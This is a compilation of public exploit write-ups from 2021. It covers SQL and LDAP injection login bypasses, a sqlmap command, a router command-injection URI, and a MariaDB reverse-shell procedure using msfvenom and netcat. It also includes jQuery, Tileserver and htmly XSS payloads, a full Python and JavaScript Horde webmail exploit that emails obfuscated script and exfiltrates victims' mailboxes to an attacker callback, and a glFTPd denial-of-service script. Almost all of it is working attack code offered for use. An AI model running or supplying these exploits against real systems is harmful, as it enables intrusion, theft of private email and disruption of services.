# Exploit Title: Simple Student Information System 1.0 - SQL Injection (Authentication Bypass) # Date: 13 April 2021 # Exploit Author: Galuh Muhammad Iman Akbar (GaluhID) # Vendor Homepage: https://www.sourcecodester.com/php/11400/simple-student-information-system-ajax-live-search.html # Software Link: https://www.sourcecodester.com/download-code?nid=11400&title=Simple+Student+Information+System+using+PHP+with+Source+Code # Version: 1.0 # Tested on: windows 10 POC Step 1 - Go to url http://localhost/studentinfosystem/index.php Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in burpsuite Step 4 – Change the username to 'or''=' and password 'or''=' Step 5 – after entering the payload, you can enter the website POST /studentinfosystem/index.php HTTP/1.1 Host: 192.168.1.14 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 46 Origin: http://192.168.1.14 Connection: close Referer: http://192.168.1.14/studentinfosystem/index.php Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe Upgrade-Insecure-Requests: 1 username='or''='&password='or''='&login=Log+In

# Exploit Title: ExpressVPN VPN Router 1.0 - Router Login Panel's Integer Overflow # Date: 09-04-2021 # Exploit Author: Jai Kumar Sharma # Vendor Homepage: https://www.expressvpn.com/ # Software Link: https://www.expressvpn.com/vpn-software/vpn-router # Version: version 1 # Tested on: Windows/Ubuntu/MacOS # CVE : CVE-2020-29238 *Proof of concept*: ExpressVPN Router's Login Panel runs on Nginx webserver, the version v1 of the router's firmware hosts web login panel on vulnerable web server ExpressVPN Summary: A publicly known bug in the Nginx server used by the ExpressVPN Router version 1.x firmware was reported. ExpressVPN no longer ships or supports that version and all users are encouraged to upgrade to the latest version of the ExpressVPN Router firmware available on our site, which is not vulnerable to this bug. Additionally, we highly discourage our users from exposing their router control panel to the Internet, as this class of bug would only be exploitable with access to the control panel, which is usually restricted to the local network. For help or support upgrading your router please visit: https://www.expressvpn.com/support/ ExpressVPN Router version 1 is vulnerable to integer overflow vulnerability in Nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request. Crafted Request: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Host: 127.0.0.1:8181 Accept-Encoding: identity Range: bytes=-17208,-9223372036854758999 Connection: close Response: HTTP/1.1 206 Partial Content Server: nginx/1.9.15 Date: Tue, 10 Nov 2020 19:22:05 GMT Content-Type: multipart/byteranges; boundary=00000000002 Content-Length: 598 Last-Modified: Thu, 13 Sep 2018 04:55:28 GMT Connection: close ETag: "5b99edc0-99f" --00000000002 Content-Type: text/html Content-Range: bytes -14745-2462/2463

# Exploit Title: CITSmart ITSM 9.1.2.22 - LDAP Injection # Google Dork: "citsmart.local" # Date: 29/12/2020 # Exploit Author: skysbsb # Vendor Homepage: https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html # Version: < 9.1.2.23 # CVE : CVE-2020-35775 To exploit this flaw it is necessary to have at least one user/password previously registered, because the system checks (ldap bind) the first user returned in the ldap search. However, it returns the last user found in the search to the function that called it (logic error). So, I call this problem an LDAP injection in conjunction with a programming logic error that allows you to authenticate to CITSmart ITSM with another valid user without needing to know the target user's password. Affected versions: < 9.1.2.23 Fixed versions: >= 9.1.2.23 Using this LDAP query in the username field of login page you could login with the target_username account without knowing the target account password. *)(|(sAMAccountName=valid_username)(sAMAccountName=target_username) You must know at least one username/password because the autenticacaoAD() function at LDAPUtils.java class (package br.com.centralit.citcorpore.integracao.ad) will try to bind with the first user (valid_username) of the query result. Vendor has acknowledge this vulnerability at ticket 5929 (https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html)

# Exploit Title: Digital Crime Report Management System 1.0 - SQL Injection (Authentication Bypass) # Date: 13 April 2021 # Exploit Author: Galuh Muhammad Iman Akbar (GaluhID) # Vendor Homepage: https://iwantsourcecodes.com/digital-crime-report-management-system-in-php-with-source-code/ # Software Link: https://iwantfilemanager.com/?dl=b48d951cbdd50568b031aab3b619fed2 I Found SQL Injection in 4 Page Login (Police Login page, Incharge Login page, User Login & HQ Login) *Police Login page* POST /digital-cyber-crime-report/policelogin.php HTTP/1.1 Host: 192.168.1.14 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 53 Origin: http://192.168.1.14 Connection: close Referer: http://192.168.1.14/digital-cyber-crime-report/policelogin.php Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe Upgrade-Insecure-Requests: 1 email='or''='&password='or''='&s= *Incharge Login* POST /digital-cyber-crime-report/inchargelogin.php HTTP/1.1 Host: 192.168.1.14 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 53 Origin: http://192.168.1.14 Connection: close Referer: http://192.168.1.14/digital-cyber-crime-report/inchargelogin.php Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe Upgrade-Insecure-Requests: 1 email='or''='&password='or''='&s= *User Login* POST /digital-cyber-crime-report/userlogin.php HTTP/1.1 Host: 192.168.1.14 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 61 Origin: http://192.168.1.14 Connection: close Referer: http://192.168.1.14/digital-cyber-crime-report/userlogin.php Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe Upgrade-Insecure-Requests: 1 email=imanakbar1000%40gmail.com&password='or''='&s= *HQ Login* POST /digital-cyber-crime-report/headlogin.php HTTP/1.1 Host: 192.168.1.14 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 61 Origin: http://192.168.1.14 Connection: close Referer: http://192.168.1.14/digital-cyber-crime-report/headlogin.php Cookie: PHPSESSID=5sll425q7s76lpl9m1copg6mpe Upgrade-Insecure-Requests: 1 email=imanakbar1000%40gmail.com&password='or''='&s=

# Exploit Title: CITSmart ITSM 9.1.2.27 - 'query' Time-based Blind SQL Injection (Authenticated) # Google Dork: "citsmart.local" # Date: 11/03/2021 # Exploit Author: skysbsb # Vendor Homepage: https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html # Version: < 9.1.2.28 # CVE : CVE-2021-28142 To exploit this flaw it is necessary to be authenticated. URL vulnerable: https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale Param vulnerable: query Sqlmap usage: sqlmap -u " https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale" --cookie 'JSESSIONID=xxx' --time-sec 1 --prefix "')" --suffix "AND ('abc%'='abc" --sql-shell Affected versions: < 9.1.2.28 Fixed versions: >= 9.1.2.28 Vendor has acknowledge this vulnerability at ticket 11216 (https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html)

# Exploit Title: Genexis PLATINUM 4410 2.1 P4410-V2-1.28 - RCE # Date: 12-4-2021 # Exploit Author: Jay Sharma # Version: Genexis PLATINUM 4410 2.1 P4410-V2-1.28 # Tested on: V2.1 # CVE : CVE-2021-29003 #steps to reproduce# Genexis PLATINUM 4410 2.1 P4410-V2-1.28 devices allow remote attackers to execute arbitrary code via shell metacharacters to sys_config_valid.xgi, as demonstrated by the http://x.x.x.x/sys_config_valid.xgi?exeshell=%60telnetd%20%26%60 URI

# Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution # Date: 03/18/2021 # Exploit Author: Central InfoSec # Version: MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL # Tested on: Linux # CVE : CVE-2021-27928 # Proof of Concept: # Create the reverse shell payload msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so # Start a listener nc -lvp <port> # Copy the payload to the target machine (In this example, SCP/SSH is used) scp CVE-2021-27928.so <user>@<ip>:/tmp/CVE-2021-27928.so # Execute the payload mysql -u <user> -p -h <ip> -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'

# Exploit Title: jQuery 1.2 - Cross-Site Scripting (XSS) # Date: 04/29/2020 # Exploit Author: Central InfoSec # Version: jQuery versions greater than or equal to 1.2 and before 3.5.0 # CVE : CVE-2020-11022 # Proof of Concept 1: <option><style></option></select><img src=x onerror=alert(1)></style>

# Exploit Title: jQuery 1.0.3 - Cross-Site Scripting (XSS) # Date: 04/29/2020 # Exploit Author: Central InfoSec # Version: jQuery versions greater than or equal to 1.0.3 and before 3.5.0 # CVE : CVE-2020-11023 # Proof of Concept 1: <style><style /><img src=x onerror=alert(1)> # Proof of Concept 2 (Only jQuery 3.x affected): <img alt="<x" title="/><img src=x onerror=alert(1)>">

# Exploit Title: Horde Groupware Webmail 5.2.22 - Stored XSS # Author: Alex Birnberg # Testing and Debugging: Ventsislav Varbanovski @nu11secur1ty # Date: 04.14.2021 # Vendor: https://www.horde.org/apps/webmail # Link: https://github.com/horde/webmail/releases # CVE: CVE-2021-26929 [+] Exploit Source: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-26929 [Exploit Program Code] #!/usr/bin/python3 # Author idea: Alex Birnberg # debug nu11secur1ty 2021 import io import os import ssl import sys import json import base64 import string import random import logging import smtplib import sqlite3 import hashlib import zipfile import argparse from flask import Flask, request, Response from urllib.parse import urlparse class Exploit: def __init__(self, args): # Database if not os.path.exists('database.db'): with sqlite3.connect("database.db") as conn: cursor = conn.cursor() cursor.execute('CREATE TABLE mailbox (hash TEXT NOT NULL UNIQUE, content BLOB NOT NULL);') conn.commit() # SMTP URL o = urlparse(args.smtp) self.smtp = { 'ssl': o.scheme.lower() == 'smtps', 'host': o.hostname or '127.0.0.1', 'port': o.port or ('465' if o.scheme.lower() == 'smtps' else '25'), 'username': '' or o.username, 'password': '' or o.password } try: if self.smtp['ssl']: context = ssl.create_default_context() context.verify_mode = ssl.CERT_OPTIONAL context.check_hostname = False self.server = smtplib.SMTP_SSL(self.smtp['host'], self.smtp['port'], context=context) else: self.server = smtplib.SMTP(self.smtp['host'], self.smtp['port']) except Exception as e: print(e) print('[-] Error connecting to SMTP server!') exit() try: self.server.login(self.smtp['username'], self.smtp['password']) except: pass # Callback URL o = urlparse(args.callback) self.callback = { 'url': '{}://{}'.format(o.scheme, o.netloc), 'path': ''.join(random.choice(string.ascii_letters) for i in range(20)) } # Listener URL o = urlparse(args.listener) self.listener = { 'ssl': o.scheme.lower() == 'https', 'host': o.hostname or '0.0.0.0', 'port': o.port or 80, 'horde': ''.join(random.choice(string.ascii_letters) for i in range(20)) } # Target email self.target = args.target # Subject self.subject = args.subject or 'Important Message' # Environment self.env = {} self.env['mailbox'] = args.mailbox or 'INBOX' self.env['callback'] = '{}/{}'.format(self.callback['url'], self.callback['path']) def trigger(self): print('[*] Waiting for emails...') self.bypass_auth() print('\n[*] Done') def bypass_auth(self): def horde(): f = open('horde.js') content = 'env = {};\n\n{}'.format(json.dumps(self.env), f.read()) f.close() return content def callback(): response = Response('') with sqlite3.connect("database.db") as conn: try: if request.files.get('mbox'): filename = request.files.get('mbox').filename.replace('zip', 'mbox') content = request.files.get('mbox').stream.read() zipdata = io.BytesIO() zipdata.write(content) content = zipfile.ZipFile(zipdata) content = content.open(filename).read() mail_hash = hashlib.sha1(content).digest().hex() print('[+] Received mailbox ({})'.format(mail_hash)) cursor = conn.cursor() cursor.execute('INSERT INTO mailbox (hash, content) VALUES (?, ?)', (mail_hash, content)) except: pass response.headers['Access-Control-Allow-Origin'] = '*' return response payload = 'var s=document.createElement("script");s.type="text/javascript";s.src="{}/{}";document.head.append(s);'.format(self.callback['url'], self.listener['horde']) payload = '<script>eval(atob("{}"))</script>'.format(base64.b64encode(payload.encode('latin-1')).decode('latin-1')) content = 'Subject: {}\nFrom: {}\nTo: {}\n'.format(self.subject, self.smtp['username'], self.target) # The secret services :) content += 'X\x00\x00\x00{}\x00\x00\x00X'.format(base64.b64encode(payload.encode('latin-1')).decode('latin-1')) self.server.sendmail(self.smtp['username'], self.target, content) app = Flask(__name__) app.add_url_rule('/{}'.format(self.listener['horde']), 'horde', horde) app.add_url_rule('/{}'.format(self.callback['path']), 'callback', callback, methods=['POST']) logging.getLogger('werkzeug').setLevel(logging.ERROR) cli = sys.modules['flask.cli'] cli.show_server_banner = lambda *x: None try: if self.listener['ssl']: app.run(host=self.listener['host'], port=self.listener['port'], ssl_context=('cert.pem', 'key.pem')) else: app.run(host=self.listener['host'], port=self.listener['port']) except: pass if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--smtp', help='SMTP URL', required=True, metavar='URL') parser.add_argument('--callback', help='Callback URL', required=True, metavar='URL') parser.add_argument('--listener', help='Listener URL', metavar='URL') parser.add_argument('--target', help='Target email', required=True, metavar='EMAIL') parser.add_argument('--subject', help='Email subject', metavar='SUBJECT') parser.add_argument('--mailbox', help='Mailbox from which to steal the emails', metavar='INBOX') args = parser.parse_args() exploit = Exploit(args) exploit.trigger() horde.js class Exploit { constructor() { this.basepath = document.location.pathname.substring(0, document.location.pathname.indexOf('imp')); } trigger() { this.mailbox = this.get_mailbox(); this.buid = this.get_buid(); this.token = this.get_token(); this.auto_delete() .then(() => { this.exfiltrate_emails({mailbox: env.mailbox}); }); } async auto_delete() { let params = new URLSearchParams() params.append('token', this.token); params.append('view', this.mailbox); params.append('buid', this.buid); return fetch(this.basepath + 'services/ajax.php/imp/deleteMessages', { method: 'POST', body: params }) .then(() => { let params = new URLSearchParams(); params.append('token', this.token); params.append('view', this.mailbox); return fetch(this.basepath + 'services/ajax.php/imp/purgeDeleted', { method: 'POST', body: params }) .then(() => { if (document.getElementById('checkmaillink') !== null) { document.getElementById('checkmaillink').click(); } }); }); } async exfiltrate_emails(args) { let mbox_list = '["' + this.get_mailbox() + '"]'; if (args.mailbox.toUpperCase() != 'INBOX') { let params = new URLSearchParams(); params.append('reload', '1'); params.append('unsub', '1'); params.append('token', this.token); let mailboxes = await fetch(this.basepath + 'services/ajax.php/imp/listMailboxes', { method: 'POST', body: params }) .then(response => { return response.text(); }) .then(data => { return JSON.parse(data.substring(10, data.length - 2)); }); mailboxes.tasks['imp:mailbox'].a.forEach(mailbox => { if (mailbox.l.toUpperCase() == args.mailbox) { if (mbox_list === undefined) { mbox_list = '["' + mailbox.m + '"]'; } } }); } let zip = await fetch(this.basepath + 'services/download/?app=imp&actionID=download_mbox&mbox_list=' + mbox_list + '&type=mboxzip&token=' + this.token + '&fn=/') .then(response => { return [response.blob(), response.headers.get('Content-Disposition')]; }); let filename = zip[1]; filename = filename.substring(filename.indexOf('filename="') + 10, filename.length - 1); zip = await zip[0]; let formData = new FormData(); formData.append('mbox', zip, filename); fetch(window.env.callback, { method: 'POST', body: formData }); } get_token() { let link; let token; if (document.getElementsByClassName('smartmobile-logout').length > 0) { link = document.getElementsByClassName('smartmobile-logout')[0].href; } else if (document.getElementById('horde-logout') !== null) { link = document.getElementById('horde-logout').getElementsByTagName('a')[0].href; } else { link = location.href; } if (link.match('horde_logout_token=(.*)&') !== null) { token = link.match('horde_logout_token=(.*)&')[1]; } if (token === undefined && link.match('token=(.*)&') !== null) { token = link.match('token=(.*)&')[1]; } return token; } get_mailbox() { if (window.DimpBase !== undefined) { return DimpBase.viewport.getSelection(DimpBase.pp.VP_view).search({ VP_id: { equal: [ DimpBase.pp.VP_id ] } }).get('dataob').first().VP_view; } else if (location.href.match('mailbox=([A-Za-z0-9]*)') !== null) { return location.href.match('mailbox=([A-Za-z0-9]*)')[1]; } else if (location.href.match('mbox=([A-Za-z0-9]*)') !== null) { return location.href.match('mbox=([A-Za-z0-9]*)')[1]; } } get_buid() { if (location.href.match('buid=([0-9]*)') !== null) { return location.href.match('buid=([0-9]*)')[1]; } else if (location.href.match(';([0-9]*)') !== null) { return location.href.match(';([0-9]*)')[1]; } } } const exploit = new Exploit(); exploit.trigger();

# Exploit Title: Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS) # Date: 15/04/2021 # Exploit Author: Akash Chathoth # Vendor Homepage: http://tileserver.org/ # Software Link: https://github.com/maptiler/tileserver-gl # Version: versions <3.1.0 # Tested on: 2.6.0 # CVE: 2020-15500 Exploit : http://example.com/?key="><script>alert(document.domain)</script>

# Exploit Title: htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS) # Authors: @nu11secur1ty & G.Dzhankushev # Date: 04.15.2021 # Vendor Homepage: https://www.htmly.com/ # Software Link: https://github.com/danpros/htmly # CVE: CVE-2021-30637 #!/usr/bin/python3 from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC import time #enter the link to the website you want to automate login. website_link="http://localhost/htmly/login" #enter your login username username="nu11secur1ty" #enter your login password password="password" #enter the element for username input field element_for_username="user" #enter the element for password input field element_for_password="password" #enter the element for submit button element_for_submit="submit" #browser = webdriver.Safari() #for macOS users[for others use chrome vis chromedriver] browser = webdriver.Chrome() #uncomment this line,for chrome users #browser = webdriver.Firefox() #uncomment this line,for chrome users browser.get((website_link)) try: username_element = browser.find_element_by_name(element_for_username) username_element.send_keys(username) password_element = browser.find_element_by_name(element_for_password) password_element.send_keys(password) signInButton = browser.find_element_by_name(element_for_submit) signInButton.click() # Exploit .ini browser.get(("http://localhost/htmly/admin/config")) browser.execute_script("document.querySelector('[name=\"-config-blog.description\"]').innerText = '</span><img src=1 onerror=alert(1) /><span>'") time.sleep(3) browser.execute_script("document.querySelector('.btn.btn-primary').click()") print("payload is deployed...\n") except Exception: #### This exception occurs if the element are not found in the webpage. print("Some error occured :(")

# Exploit Title: glFTPd 2.11a - Remote Denial of Service # Date: 15/05/2021 # Exploit Author: xynmaps # Vendor Homepage: https://glftpd.io/ # Software Link: https://glftpd.io/files/glftpd-LNX-2.11a_1.1.1k_x64.tgz # Version: 2.11a # Tested on: Parrot Security OS 5.9.0 #-------------------------------# #encoding=utf8 #__author__ = XYN/Dump/NSKB3 #glFTPd Denial of Service exploit by XYN/Dump/NSKB3. """ glFTPd only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server, you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited. (if it's limited, just run this script from different proxies using proxychains, and it will work) """ import socket import sys import threading import subprocess import time banner = """ ._________________. | glFTPd | | D o S | |_________________| |By XYN/DUMP/NSKB3| |_|_____________|_| |_|_|_|_____|_|_|_| |_|_|_|_|_|_|_|_|_| """ usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0]) def test(t,p): s = socket.socket() s.settimeout(10) try: s.connect((t, p)) response = s.recv(65535) s.close() return 0 except socket.error: print("Port {} is not open, please specify a port that is open.".format(p)) sys.exit() def attack(targ, po, id): try: subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) #print("Worker {} running".format(id)) except OSError: pass def main(): global target, port, start print banner try: target = sys.argv[1] except: print usage sys.exit() try: port = int(sys.argv[2]) except: port = 21 try: conns = int(sys.argv[3]) except: conns = 50 print("[!] Testing if {0}:{1} is open".format(target, port)) test(target, port) print("[+] Port {} open, starting attack...".format(port)) time.sleep(2) print("[+] Attack started on {0}:{1}!".format(target, port)) def loop(target, port, conns): global start threading.Thread(target=timer).start() while 1: for i in range(1, conns + 3): t = threading.Thread(target=attack, args=(target,port,i,)) t.start() if i > conns + 2: t.join() break loop() t = threading.Thread(target=loop, args=(target, port, conns,)) t.start() def timer(): start = time.time() while 1: if start < time.time() + float(900): pass else: subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) t = threading.Thread(target=loop, args=(target, port,)) t.start() break main()